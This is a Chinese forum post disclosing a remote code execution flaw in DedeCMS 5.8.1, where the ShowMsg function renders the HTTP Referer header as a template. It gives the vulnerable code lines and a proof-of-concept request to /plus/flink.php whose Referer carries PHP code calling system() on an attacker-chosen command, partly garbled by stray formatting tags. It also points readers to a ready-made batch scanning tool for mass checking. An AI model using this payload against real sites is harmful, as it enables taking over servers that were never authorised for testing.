设为首页 收藏本站

QQ登录

只需一步,快速开始

切换到宽版 切换风格

电脑疯子技术论坛|电脑极客社区

电脑疯子技术论坛|电脑极客社区»技术论坛 电脑疯子|资源分享 电脑教程分享 帖子
微信扫一扫 分享朋友圈

已有 1175 人浏览分享

织梦5.8.1 RCE漏洞

[复制链接]
1175 0
织梦5.8.1 RCE漏洞

在include\common.func.php文件中的ShowMsg函数存在模板注入

224648rd8v79d9tg0f275d.png

  1. $gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
复制代码

从Referer头中取值,然后进行渲染 造成RCE
  1. $tpl = new DedeTemplate();
  2. $tpl->LoadString($msg);
复制代码

POC:
  1. GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
  2. Host: 10.211.55.3[/size][/font][/color][/align][align=left][font=Optima-Regular, Optima, PingFangSC-light
  3. PingFangTC-light, PingFang SC, Cambria, Cochin, Georgia, Times, Times New Roman, serif][color=#3f3f3
  4. f]cookie:[/color][/font]PHPSESSID=ferfe1a0k6qd5u9ol5gbd6nieu[/align][align=left][color=rgb(63, 63, 63
  5. )][font=Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &quot][size=16px]Referer: <?ph
  6. p "system"($c);die;/*
复制代码

如果有人懒的话 可以直接下载现成的PHP批量检测

225021ohf4oczv26otfmdo.png

举报

回复
返回列表
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

zhaorong
VIP荣誉会员

1

关注

0

粉丝

9021

主题
精彩推荐
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子 GHOST WIN7 X64 快速装机版202001
电脑疯子技术论坛GHOST WIN10X64 快速装机版201909
电脑疯子技术论坛GHOST WIN10X64 快速装机
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子 GHOST WIN7 X86 快速装机版202001
电脑疯子技术论坛GHOST WIN10X86 快速装机版201909
电脑疯子技术论坛GHOST WIN10X86 快速装机
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.